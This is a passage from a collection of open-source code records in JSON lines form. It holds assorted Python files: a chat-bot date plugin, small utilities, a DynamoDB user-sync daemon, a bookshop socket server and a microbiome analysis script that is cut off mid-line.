'%d'+spl+'%m'+spl+'%y',\n\t\t'%d'+spl+'%m'+spl+'%Y', '%Y'+spl+'%m'+spl+'%d']\n\t#output = list(time.localtime())[:3]\n\tfor format in date_formats:\n\t\ttry: output = list(time.strptime(string_date, format))[:3]\n\t\texcept: pass\n\treturn output\n\ndef to_date(type, jid, nick, text):\n\tdmass = (L('days','%s/%s'%(jid,nick)), L('day','%s/%s'%(jid,nick)), L('Days','%s/%s'%(jid,nick)).lower(), L('Days','%s/%s'%(jid,nick)).lower(),\n\t\tL('Days','%s/%s'%(jid,nick)).lower(), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)))\n\tsplitters = ('.', '-', ':', '/', ',', '\\\\')\n\tif len(text):\n\t\ttry:\n\t\t\tspl = [spl for spl in splitters if spl in text][0]\n\t\t\tsdate = parse_date_string(text, spl)\n\t\t\tif sdate[0] == 1900: sdate[0] = list(time.localtime())[0]\n\t\t\tyear = sdate.pop(0)\n\t\t\tmonth, day = sdate\n\t\t\thday = get_holiday(sdate)\n\t\t\ttext = text.replace(spl, '.')\n\t\t\tmsg = ''\n\t\t\tif len(hday) > 0: text = hday\n\t\t\tdays_remain = (datetime.date(year, month, day) - datetime.date.today()).days\n\t\t\tif len(str(abs(days_remain))) > 1 and str(days_remain)[-2] == '1':\n\t\t\t\tdmass = (L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)))\n\t\t\tif days_remain < 0: msg += L('was %s %s ago','%s/%s'%(jid,nick)) % \\\n\t\t\t\t(str(abs(days_remain)), dmass[int(str(days_remain)[-1])])\n\t\t\telif days_remain == 0: msg += L('today','%s/%s'%(jid,nick))\n\t\t\telse: msg += L('will be in %s %s','%s/%s'%(jid,nick)) % \\\n\t\t\t\t(str(abs(days_remain)), dmass[int(str(days_remain)[-1])])\n\t\t\tmsg = text + ' ' + msg\n\t\texcept: msg = L('Error in parameters. Read the help about command.','%s/%s'%(jid,nick))\n\telse: msg = L('Error in parameters. Read the help about command.','%s/%s'%(jid,nick))\n\tsend_msg(type, jid, nick, msg)\n\ndef todate(type, jid, nick, text):\n\tdmass = (L('days','%s/%s'%(jid,nick)), L('day','%s/%s'%(jid,nick)), L('Days','%s/%s'%(jid,nick)).lower(), L('Days','%s/%s'%(jid,nick)).lower(),\n\t\tL('Days','%s/%s'%(jid,nick)).lower(), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)), L('days','%s/%s'%(jid,nick)))\n\tsplitters = ('.', '-', ':', '/', ',', '\\\\')\n\tmsg = ''\n\tif len(text):\n\t\ttry:\n\t\t\tif ' ' in text: ddate, msg = text.split(' ', 1)[0], text.split(' ', 1)[1]\n\t\t\telse: ddate = text\n\t\t\tspl = [spl for spl in splitters if spl in ddate][0]\n\t\t\tif len(msg) == 0: msg = L('before the %s remained','%s/%s'%(jid,nick)) % ddate.replace(spl, '.')\n\t\t\tsdate = parse_date_string(ddate, spl)\n\t\t\tif sdate[0] == 1900: sdate[0] = list(time.localtime())[0]\n\t\t\tyear = sdate.pop(0)\n\t\t\tmonth, day = sdate\n\t\t\tdays_remain = (datetime.date(year, month, day) - datetime.date.today()).days\n\t\t\tif len(str(abs(days_remain))) > 1 and str(days_remain)[-2] == '1':\n\t\t\t\tdmass = (L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)),\n\t\t\t\t\tL('days','%s/%s'%(jid,nick)),L('days','%s/%s'%(jid,nick)))\n\t\t\tif days_remain < 0: msg = L('Date has already in past!','%s/%s'%(jid,nick))\n\t\t\telse: msg += ' %s %s' % (days_remain,dmass[int(str(days_remain)[-1])])\n\t\texcept: msg = L('Error in parameters. Read the help about command.','%s/%s'%(jid,nick))\n\telse: msg = L('Error in parameters. Read the help about command.','%s/%s'%(jid,nick))\n\tsend_msg(type, jid, nick, msg)\n\nglobal execute\n\nexecute = [(3, 'to_date', to_date, 2, 'Calculate count of days for requested date, if the date is holiday, that returned title of holiday.\\nSupported date formats: dd.mm.yyyy, dd.mm, dd.mm.yy, yyyy.mm.dd\\nSupported splitters: ,-.:/\\\\\\ntodate 05.09\\ntodate 5/9/2010'),\n\t(3, 'todate', todate, 2, 'Calculate count of days for requested date.\\nSupported date formats: dd.mm.yyyy, dd.mm, dd.mm.yy, yyyy.mm.dd\\nSupported splitter: ,-.:/\\\\\\ntodate 05.09 before New year remained\\ntodate 5/9/2010 before New year remained')]\n","repo_name":"isida/4","sub_path":"plugins/todate.py","file_name":"todate.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"21"} +{"seq_id":"29964730933","text":"from collections import Counter\nfrom sys import stdin\ndef arithmetic_geometric_mean(n, NumList=[]):\n return round(sum(NumList)/n)\ndef median(n, NumList=[]):\n if n==1:\n return NumList[0] \n NumList.sort()\n return (NumList)[int((n)/2)]\n\ndef mode(n, NumList=[]):\n if n==1:\n return NumList[0] \n count = Counter(NumList).most_common()\n\n modes = []\n for num in count:\n if num[1] == count[0][1]:\n modes.append(num[0])\n\n modes.sort()\n if len(modes) > 1:\n return modes[1]\n else:\n return modes[0]\n\ndef rng(n, NumList=[]):\n if n == 1:\n return 0\n NumList.sort()\n return NumList[-1]-NumList[0]\n\nn = int(stdin.readline())\nNumList = []\nfor i in range(n):\n NumList.append(int(stdin.readline()))\n\nprint(arithmetic_geometric_mean(n, NumList))\nprint(median(n, NumList))\nprint(mode(n, NumList))\nprint(rng(n, NumList))","repo_name":"GDSC-SCH/2021-GDSCSCH-AlgorithmStudy","sub_path":"15_이준용/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18526329072","text":"from absl import flags\nfrom absl import app\nimport os\n\nFLAGS = flags.FLAGS\nflags.DEFINE_integer (\"i\", 8, \"Number of inputs\")\nflags.DEFINE_integer (\"s\", 3, \"Number of select bits\")\nflags.DEFINE_integer (\"o\", 1, \"Width of output\")\n\nnum_inputs = None\nnum_selects = None\nnum_outputs = None\n\ndef init_setup ():\n global num_inputs, num_selects, num_outputs\n num_inputs = FLAGS.i\n num_selects = FLAGS.s\n num_outputs = FLAGS.o\n return\n\n\ndef gen_yoscript ():\n global num_inputs, num_selects, num_outputs\n read_file = open (\"yosys_verilog/mux_param_template.v\", \"r\")\n write_file = open (\"yosys_verilog/mux_param.v\", \"w\")\n\n lines = read_file.readlines ()\n for line in lines:\n if \"*NUM_INPUTS\" in line:\n write_file.write (\"\\tparameter NUM_INPUT = {},\\n\".format (num_inputs))\n elif \"*NUM_SELECTS\" in line:\n write_file.write (\"\\tparameter SEL_WIDTH = {},\\n\".format (num_selects))\n elif \"*NUM_OUTPUTS\" in line:\n write_file.write (\"\\tparameter DATA_WIDTH = {},\\n\".format (num_outputs))\n else:\n write_file.write (line)\n return\n\n\ndef run_gate_synthesis ():\n os.chdir (\"yosys_script\")\n os.system (\"yosys mux_param.ys\")\n\n\ndef run_sfq_synthesis ():\n global num_inputs, num_selects, num_outputs\n os.chdir (\"../\")\n os.system (\"python sfq_gate_analysis.py --un mux_{}_{}_{} --vlg synth_vlg/synth_mux_param.v\".format \\\n (num_inputs, num_selects, num_outputs))\n\n\ndef main (argv):\n init_setup ()\n gen_yoscript ()\n run_gate_synthesis ()\n run_sfq_synthesis ()\n\n\nif __name__ == \"__main__\":\n app.run (main)\n","repo_name":"SNU-HPCS/QIsim","sub_path":"device_model/rsfq/drive_mux.py","file_name":"drive_mux.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"34324518668","text":"import os, glob, torch\nimport numpy as np\n\nfrom PIL import Image\n\ndef load_model(model,filepath):\n state_dict = torch.load(filepath)\n new_state_dict= {}\n oldkeys = state_dict.copy().keys()\n\n #eliminate prefix module. concated by using nn.Dataparallel function\n for key in oldkeys:\n prefix_loc = key.find('module.')\n if prefix_loc == 0:\n newkey = key.replace(\"module.\",\"\",1)\n new_state_dict[newkey] = state_dict.pop(key)\n model.load_state_dict(new_state_dict)\n\n return model\n\ndef remove_small_images(datasetpath, minimum=296):\n Dataset_PATH = datasetpath\n imagelist = os.listdir(Dataset_PATH)\n \n length = len(imagelist)\n removelist = []\n print(\"investigate {} images\".format(length))\n\n for i,imagename in enumerate(imagelist):\n imagepath = os.path.join(Dataset_PATH,imagename)\n image = Image.open(imagepath)\n imagesize = np.array(image).shape\n \n if (imagesize[0] /external/microsoft',\n resource_class_args=args,\n )\n","repo_name":"wazo-platform/wazo-auth","sub_path":"wazo_auth/plugins/external_auth/microsoft/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"18322725493","text":"import argparse\nfrom util.utils import realpath, is_dir, is_file, input_exist, filename_and_extension\n\n\ndef proccess_dir(directory, extension):\n directory = realpath(directory)\n\n if not is_dir(directory):\n raise argparse.ArgumentTypeError(f'{directory} is not an existing directory!')\n\n if not input_exist(directory, extension):\n raise argparse.ArgumentTypeError(f'No files with {extension} extension exits in {directory}')\n\n return directory\n\n\ndef proccess_file(file):\n try:\n f = realpath(file)\n except Exception:\n return None\n\n if not is_file(f):\n raise argparse.ArgumentTypeError(f'{file} is not an existing file!')\n\n return f\n\n\ndef proccess_filename(filename, default_settings):\n filename, extension = filename_and_extension(filename)\n\n if extension and extension != default_settings.output_extension:\n print(f'ignoring extension {extension}! Using {default_settings.output_extension}')\n\n return realpath(filename)\n\n\ndef resolve_encoding(encoding_quality, default_settings):\n if encoding_quality is None:\n return default_settings.encoder, default_settings.encoding_quality\n else:\n return 'x265', encoding_quality\n\n\ndef positive_int(v):\n def fail():\n raise argparse.ArgumentTypeError('Positive Integer value expected.')\n\n try:\n result = int(v)\n if result < 0:\n fail()\n return result\n except Exception:\n fail()\n\n\ndef positive_float(v):\n def fail():\n raise argparse.ArgumentTypeError('Positive Float value expected.')\n\n try:\n result = float(v)\n if result < 0:\n fail()\n return result\n except Exception:\n fail()\n\n\ndef x265_preset_int(v):\n def fail():\n raise argparse.ArgumentTypeError('Integer 0-8 expected.')\n\n try:\n result = int(v)\n if result < 0 or result > 8:\n fail()\n return result\n except Exception:\n fail()\n","repo_name":"atiratree/timelapse-to-video","sub_path":"arg_parses/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32320923277","text":"from command import ActionBinder\nfrom recognition import VoiceTranslator\nfrom ui import ConsoleUI\nfrom speaker import Speaker\nfrom listener import Listener\nfrom functions import actual_commands, goodbye, current_time, light_off, light_on, love_you, tell_it\nimport serial\n\n\nif __name__ == \"__main__\":\n serial_is_used_for_arduino = False\n if serial_is_used_for_arduino:\n ser = serial.Serial('/dev/ttyUSB0')\n \n\n aliases = dict()\n vt = VoiceTranslator()\n ui = ConsoleUI()\n cm = ActionBinder(vt, aliases)\n\n\n cm.bind_action(ui, goodbye)\n cm.bind_action(ui, current_time)\n cm.bind_action(ui, love_you)\n \n if serial_is_used_for_arduino:\n cm.bind_action(ui, light_on)\n cm.bind_action(ui, light_off)\n cm.bind_action(ui, actual_commands, aliases)\n cm.bind_action_mannualy(('Lustereczko powiedz przecie kto jest najpiękniejszy w świecie',), tell_it)\n\n l = Listener((\"Cześć Tomek\", \"Cześć Tomku\", \"Tomek\", \"Tomku\"), cm.aliases, vt)\n l.start_listen()\n\n\n if serial_is_used_for_arduino:\n ser.close()\n\n print(\"dokonało się\")","repo_name":"WojciechBogobowicz/Voice-menager-module","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16028053444","text":"# 그리디 알고리즘 실버4 ATM\n# 돈 인출에 최소걸리게\n\nn = int(input())\np = list(map(int, input().split()))\nk = 0\np.sort()\narr = []\nfor i in range(n):\n k += p[i]\n arr.append(k)\n\nprint(sum(arr))\n","repo_name":"lookinmin/algorithm_study","sub_path":"week10/bakjoon_11399.py","file_name":"bakjoon_11399.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34631727604","text":"\"\"\"\nDaemon for keeping users in-sync with the DynamoDB table.\n\"\"\"\nfrom logging import getLogger\nfrom random import randint\nfrom time import sleep\nfrom typing import Any, Dict\nimport botocore # pylint: disable=W0611\nfrom .constants import (\n KEY_FULL_UPDATE_JITTER, KEY_FULL_UPDATE_PERIOD,\n KEY_GROUP_TABLE_NAME, KEY_USER_TABLE_NAME)\nfrom .group import Group\nfrom .shadow import ShadowDatabase\nfrom .user import User\n\n# pylint: disable=C0103\n\nlog = getLogger(__name__)\n\nclass Daemon():\n \"\"\"\n Runtime daemon for process control.\n \"\"\"\n\n def __init__(\n self, ddb: \"botocore.client.DynamoDB\", config: Dict[str, Any]) -> None:\n \"\"\"\n Daemon(ddb: botocore.client.DynamoDB, user_table_name: str, group_table_name: str) -> Daemon\n Create a new Daemon for keeping users up-to-date.\n \"\"\"\n super(Daemon, self).__init__()\n self.ddb = ddb\n self.config = config\n self.shadow = ShadowDatabase()\n self.dynamodb_users = {} # type: Dict[str, User]\n self.dynamodb_groups = {} # type: Dict[str, Group]\n\n def reload_users(self) -> None:\n \"\"\"\n daemon.load_users() -> None\n Reload the entire users table.\n \"\"\"\n table_name = self.config.get(KEY_USER_TABLE_NAME, \"Users\")\n log.info(\"Reloading users from DynamoDB table %s\", table_name)\n\n users = {} # type: Dict[str, User]\n paginator = self.ddb.get_paginator(\"scan\")\n page_iterator = paginator.paginate(\n TableName=table_name, ConsistentRead=True)\n\n # We rely entirely on the Boto3 client to retry failed reads here.\n for page in page_iterator:\n items = page.get(\"Items\", [])\n for item in items:\n username = item[\"Name\"][\"S\"]\n assert username not in users\n\n user = self.shadow.users.get(username)\n if user is None:\n user = User.from_dynamodb_item(item)\n self.shadow.users[username] = user\n else:\n user.update_from_dynamodb_item(item)\n\n users[username] = user\n\n self.dynamodb_users = users\n\n def reload_groups(self) -> None:\n \"\"\"\n daemon.reload_groups() -> None\n Reload the entire groups table.\n \"\"\"\n table_name = self.config.get(KEY_GROUP_TABLE_NAME, \"Groups\")\n log.info(\"Reloading groups from DynamoDB table %s\", table_name)\n\n groups = {} # type: Dict[str, Group]\n paginator = self.ddb.get_paginator(\"scan\")\n page_iterator = paginator.paginate(\n TableName=table_name, ConsistentRead=True)\n\n # We rely entirely on the Boto3 client to retry failed reads here.\n for page in page_iterator:\n items = page.get(\"Items\", [])\n for item in items:\n groupname = item[\"Name\"][\"S\"]\n assert groupname not in groups\n\n group = self.shadow.groups.get(groupname)\n if group is None:\n group = Group.from_dynamodb_item(item)\n self.shadow.groups[groupname] = group\n else:\n group.update_from_dynamodb_item(item)\n\n groups[groupname] = group\n\n self.dynamodb_groups = groups\n\n def full_update(self) -> None:\n \"\"\"\n daemon.full_update()\n Perform a full update by scanning the entire DynamoDB table and adding\n users who exist in DynamoDB but not locally, deleting users who exist\n locally but not in DynamoDB, and updating any users who exist in both\n repositories.\n \"\"\"\n # First, refetch everything from DynamoDB\n self.reload_groups()\n self.reload_users()\n\n # Rewrite the /etc/group, /etc/passwd, /etc/gshadow, and\n # /etc/shadow files.\n if self.shadow.modified:\n log.info(\"Shadow database modified; rewriting\")\n self.shadow.write()\n\n # For each DynamoDB user, make sure they have a valid home and ssh keys.\n for user in self.dynamodb_users.values():\n try:\n self.shadow.create_user_home(user)\n self.shadow.write_user_ssh_keys(user)\n except Exception as e: # pylint: disable=W0703\n log.error(\"Failed to create/update user %s: %s\", user.name, e,\n exc_info=True)\n\n def main_loop(self) -> None:\n \"\"\"\n daemon.main_loop() -> None\n Run continuously until interrupted, polling the DynamoDB table and\n rewriting the shadow files (if needed) periodicially.\n\n The periodicity is controlled by the following config keys:\n full_update_period \n The interval, in seconds, between polls. If unspecified, this\n defaults to 3600 seconds (1 hour).\n\n full_update_jitter \n Maximum jitter, in seconds, to add to the period. This prevents\n many instances of DynamoDBUserManager from simultaneously\n overloading DynamoDB. If unspecified, this defaults to\n 600 seconds (10 minutes)\n \"\"\"\n log.info(\"Starting main_loop\")\n while True:\n jitter_max = self.config.get(KEY_FULL_UPDATE_JITTER, 600)\n jitter = randint(0, jitter_max)\n log.info(\n \"Jitter sleeping for %d seconds (of %d maximum)\", jitter,\n jitter_max)\n\n sleep(jitter)\n\n log.info(\"Executing full update\")\n try:\n self.full_update()\n log.info(\"Full update completed successfully\")\n except Exception as e: # pylint: disable=W0703\n log.error(\"Full update failed: %s\", e, exc_info=True)\n\n period = self.config.get(KEY_FULL_UPDATE_PERIOD)\n log.info(\"Regular sleeping for %d seconds\", period)\n sleep(period)\n\n # For testing purposes\n self.main_loop_done_hook()\n\n def main_loop_done_hook(self) -> Any: # pragma: nocover\n \"\"\"\n daemon.main_loop_done_hook() -> None\n Hook method called at the end of main_loop. Not used except in unit\n tests as an escape hatch.\n \"\"\"\n # pylint: disable=R0201\n return\n","repo_name":"dacut/dynamodb-user-manager","sub_path":"dynamodbusermanager/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19943601216","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nclass win:\n batch = None\n @staticmethod\n def symlink(src, dst):\n if not win.batch:\n win.batch = open('symbolic.cmd', 'w')\n win.batch.write('@ECHO OFF\\n')\n win.batch.write('MKLINK /J %s %s\\n' % (dst, src))\n\ndef accounts():\n prefix = os.path.join('WTF', 'Account')\n foo = os.path.join(prefix, '83215426#1')\n bar = ['150998550#1', '150998550#2', '223607616#1', '223607616#2', 'WOW_TAB']\n for path in [os.path.join(prefix, e) for e in bar]:\n if sys.platform.startswith('win'):\n win.symlink(foo, path)\n else:\n os.symlink(foo, path)\n\ndef characters():\n prefix = os.path.join('WTF', 'Account', '83215426#1')\n foo = os.path.join(prefix, 'Tichondrius', 'Masoshonen')\n bar = [\n 'Tichondrius - Morgiane', 'Tichondrius - Morgianu',\n 'Stormrage - Masoshonen',\n '熊猫酒仙 - 魔装少年', '凤凰之神 - 依然活著', '凤凰之神 - 仍然活著',\n ]\n for path in [os.path.join(prefix, *c.split(' - ')) for c in bar]:\n if sys.platform.startswith('win'):\n win.symlink(foo, path)\n else:\n os.symlink(foo, path)\n \ndef main():\n accounts()\n characters()\n if win.batch:\n win.batch.write('PAUSE')\n win.batch.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"jki14/nichijou-scripts","sub_path":"wow/symbolic/retail/symbolic.py","file_name":"symbolic.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37362432686","text":"import socket\nimport threading\nimport random\nprevious_orders = {}\n\n# dictionary of books and their details\nbooks = {\n 101: {\"name\": \"More Peak District\", \"price\": 12.99, \"inventory\": 10},\n 102: {\"name\": \"Lincolnshire Wolds\", \"price\": 10.99, \"inventory\": 10},\n 103: {\"name\": \"Vale of York\", \"price\": 11.99, \"inventory\": 10},\n 104: {\"name\": \"Peak District\", \"price\": 12.99, \"inventory\": 10},\n 105: {\"name\": \"Snowdonia\", \"price\": 13.99, \"inventory\": 10},\n 106: {\"name\": \"Malvern and Warwickshire\", \"price\": 10.99, \"inventory\": 10},\n 107: {\"name\": \"Cheshire\", \"price\": 12.99, \"inventory\": 10}\n}\n# dictionary of walks and their details\nwalks = [\n {\"area\": \"PeakDistrict\", \"book\": \"More Peak District\", \"name\": \"Hathasage\", \"distance\": 7, \"difficulty\": \"Easy\", \"page\": 67},\n {\"area\": \"PeakDistrict\", \"book\": \"More Peak District\", \"name\": \"Hope and Win Hill\", \"distance\": 4.5, \"difficulty\": \"Medium\", \"page\": 18},\n {\"area\": \"Lincolnshire\", \"book\": \"Lincolnshire Wolds\", \"name\": \"Thornton Abbey\", \"distance\": 3.5, \"difficulty\": \"Easy\", \"page\": 20},\n {\"area\": \"Lincolnshire\", \"book\": \"Lincolnshire Wolds\", \"name\": \"Tennyson County\", \"distance\": 5, \"difficulty\": \"Hard\", \"page\": 28},\n {\"area\": \"York\", \"book\": \"Vale Of York\", \"name\": \"Cowlam and Cotham\", \"distance\": 8, \"difficulty\": \"Hard\", \"page\": 64},\n {\"area\": \"York\", \"book\": \"Vale of York\", \"name\": \"Fridaythorpe\", \"distance\": 7, \"difficulty\": \"Easy\", \"page\": 42},\n {\"area\": \"PeakDistrict\", \"book\": \"Peak District\", \"name\": \"Magpie Mine\", \"distance\": 4.5, \"difficulty\": \"Medium\", \"page\": 20},\n {\"area\": \"PeakDistrict\", \"book\": \"Peak District\", \"name\": \"Lord’s Seat\", \"distance\": 5.5, \"difficulty\": \"Easy\", \"page\": 28},\n {\"area\": \"NorthWales\", \"book\": \"Snowdonia\", \"name\": \"Around Aber\", \"distance\": 4, \"difficulty\": \"Hard\", \"page\": 24},\n {\"area\": \"NorthWales\", \"book\": \"Snowdonia\", \"name\": \"Yr Eifl\", \"distance\": 3.5, \"difficulty\": \"Medium\", \"page\": 42},\n {\"area\": \"Warwickshire\", \"book\": \"Malvern and Warwickshire\", \"name\": \"Edge Hill\", \"distance\": 4, \"difficulty\": \"Easy\", \"page\": 28},\n {\"area\": \"Warwickshire\", \"book\": \"Malvern and Warwickshire\", \"name\": \"Bidford-UponAvon\", \"distance\": 8.5, \"difficulty\": \"Medium\", \"page\": 78},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Dane Valley\", \"distance\": 8.5, \"difficulty\": \"Easy\", \"page\": 20},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Malpas\", \"distance\": 8.5, \"difficulty\": \"Medium\", \"page\": 80},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Farndon\", \"distance\": 8.5, \"difficulty\": \"Hard\", \"page\": 48},\n {\"area\": \"Cheshire\", \"book\": \"Cheshire\", \"name\": \"Delamere Forest\", \"distance\": 5.5, \"difficulty\": \"Easy\", \"page\": 30}]\n\norders = {}\ndef levenshtein_distance(s1, s2):\n if len(s1) > len(s2):\n s1, s2 = s2, s1\n\n distances = range(len(s1) + 1)\n for i2, c2 in enumerate(s2):\n new_distances = [i2 + 1]\n for i1, c1 in enumerate(s1):\n if c1 == c2:\n new_distances.append(distances[i1])\n else:\n new_distances.append(1 + min((distances[i1], distances[i1 + 1], new_distances[-1])))\n distances = new_distances\n return distances[-1]\n\ndef find_closest_match(word, word_list):\n distances = [levenshtein_distance(word, w) for w in word_list]\n closest_match_index = distances.index(min(distances))\n return word_list[closest_match_index]\n\n\ndef correct_typos(message):\n corrected_message = []\n areas = list(set([walk[\"area\"] for walk in walks]))\n difficulties = list(set([walk[\"difficulty\"] for walk in walks]))\n commands = [\"Search\", \"Buy\", \"exit\"]\n max_distance_threshold = 2\n \n for i, word in enumerate(message):\n if i == 0: # Command\n closest_command = find_closest_match(word, commands)\n if levenshtein_distance(word, closest_command) <= max_distance_threshold:\n corrected_message.append(closest_command)\n else:\n corrected_message.append(word)\n elif i == 1 and message[0] == \"Search\": # Area\n closest_area = find_closest_match(word, areas)\n if levenshtein_distance(word, closest_area) <= max_distance_threshold:\n corrected_message.append(closest_area)\n else:\n corrected_message.append(word)\n elif i == 4 and message[0] == \"Search\": # Difficulty\n closest_difficulty = find_closest_match(word, difficulties)\n if levenshtein_distance(word, closest_difficulty) <= max_distance_threshold:\n corrected_message.append(closest_difficulty)\n else:\n corrected_message.append(word)\n else:\n corrected_message.append(word)\n \n return corrected_message\n\ndef handle_client(conn, addr):\n print(\"Connected by\", addr)\n while True:\n data = conn.recv(1024).decode(\"utf-8\")\n if not data:\n break\n message = data.strip().split(\" \")\n message = correct_typos(message)\n \n print(message)\n try:\n if message[0] == \"Search\":\n area = message[1]\n min_distance = int(message[2])\n max_distance = int(message[3])\n difficulty = message[4]\n recommended_walks = []\n for walk in walks:\n if walk[\"area\"] == area and min_distance <= walk[\"distance\"] <= max_distance and walk[\"difficulty\"] == difficulty:\n recommended_walks.append(f\"{walk['name']}, {walk['book']}, pg {walk['page']}\")\n if recommended_walks:\n recommended_walks_str = \"\\n\".join(recommended_walks)\n conn.send(f\"Recommended walks:\\n{recommended_walks_str}\".encode(\"utf-8\"))\n else:\n conn.send(\"No walks found for the given criteria\".encode(\"utf-8\"))\n\n elif message[0] == \"Buy\":\n customer_name = message[1]\n order = []\n order_cost = 0\n not_enough_books = []\n for i in range(2, len(message), 2):\n book_number = int(message[i])\n book_quantity = int(message[i + 1])\n book = books.get(book_number)\n if book:\n if book[\"inventory\"] >= book_quantity:\n book_cost = book[\"price\"] * book_quantity\n order.append((book[\"name\"], book_quantity, book_cost))\n order_cost += book_cost\n book[\"inventory\"] -= book_quantity\n else:\n not_enough_books.append((book[\"name\"], book[\"inventory\"]))\n if not_enough_books:\n not_enough_books_str = \"\\n\".join([f\"{book_name}: {inventory} available\" for book_name, inventory in not_enough_books])\n conn.send(f\"Insufficient inventory for the following books:\\n{not_enough_books_str}\\n\".encode(\"utf-8\"))\n elif order:\n if customer_name in orders:\n previous_orders = orders[customer_name]\n total_books = sum([order[1] for order in previous_orders + order])\n if total_books > 50:\n conn.send(\"Error: you have reached the maximum number of books you can buy\".encode(\"utf-8\"))\n else:\n order_cost_str = f\"Order cost: £{order_cost:.2f}\"\n order_str = \"\\n\".join([f\"{book_name} x {book_quantity}: £{book_cost:.2f}\" for book_name, book_quantity, book_cost in order])\n if order_cost > 75:\n order_cost_str += f\"\\nDiscount applied: £{order_cost * 0.1:.2f}\"\n order_cost -= order_cost * 0.1\n conn.send(f\"{order_str}\\n{order_cost_str}\".encode(\"utf-8\"))\n orders[customer_name] = previous_orders + order\n else:\n order_cost_str = f\"Order cost: £{order_cost:.2f}\"\n order_str = \"\\n\".join([f\"{book_name} x {book_quantity}: £{book_cost:.2f}\" for book_name, book_quantity, book_cost in order])\n if order_cost > 75:\n order_cost_str += f\"\\nDiscount applied: £{order_cost * 0.1:.2f}\"\n order_cost -= order_cost * 0.1\n conn.send(f\"{order_str}\\n{order_cost_str}\".encode(\"utf-8\"))\n orders[customer_name] = order\n else:\n conn.send(\"No books ordered\".encode(\"utf-8\"))\n\n elif message[0] == \"exit\":\n break\n else:\n conn.send(\"Invalid request, Try a command in our command library\".encode(\"utf-8\"))\n \n except:\n conn.send(\"Didnt follow the write code criteria, its Search [Area Where Want to Walk] [Minimum Length in Miles] [Maximum Length in Miles] [Level of Difficult]\".encode(\"utf-8\"))\n \n\n conn.close()\n\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind((\"localhost\", 12345))\nserver_socket.listen(5)\n\nwhile True:\n conn, addr = server_socket.accept()\n client_thread = threading.Thread(target=handle_client, args=(conn, addr))\n client_thread.start()\n","repo_name":"emocreator/Client_Server_Project_Uni","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7301101647","text":"import os\nimport numpy as np\nimport copy\nimport scipy.stats\nfrom scipy.stats import hypergeom\nfrom bootstrapAGORAIBD import writeData\n\ndef calcEigs(bigmap,eigminarr,eigmaxarr,eigmeanarr):\n mergedFI = open('/mnt/vdb/home/ubuntu2/tobemerged2.txt')\n mergedFI.readline()\n rxnstosubs = {}\n for line in mergedFI:\n words = line.strip().split('\\t')\n if len(words)==3:\n rxnstosubs[words[0]] = words[2]\n mergedFI.close()\n for ithIdx in bigmap:\n for jthIdx in bigmap[ithIdx]:\n competecount = 0\n coopcount = 0\n for rxn in bigmap[ithIdx][jthIdx]:\n if rxn in rxnstosubs and (rxnstosubs[rxn]=='Transport, extracellular' or rxnstosubs[rxn]=='Transport'):\n flux1 = bigmap[ithIdx][jthIdx][rxn][0]\n flux2 = bigmap[ithIdx][jthIdx][rxn][1]\n if flux1!=0 and flux2!=0:\n if (flux1>0 and flux2>0) or (flux1<0 and flux2<0):\n competecount += 1\n interactMat[ithIdx,jthIdx] += -abs(flux1)-abs(flux2)\n elif (flux1>0 and flux2<0) or (flux1<0 and flux2>0):\n coopcount += 1\n interactMat[ithIdx,jthIdx] += abs(flux1)+abs(flux2)\n if competecount>0 or coopcount>0:\n pass\n #print(ithIdx)\n #print(jthIdx)\n #print(competecount)\n #print(coopcount)\n interactMat2 = copy.deepcopy(interactMat)\n for i in range(len(interactMat)):\n nonzerovals = interactMat[i,interactMat[i,:]!=0]\n if len(nonzerovals)!=0:\n nonzeromean = 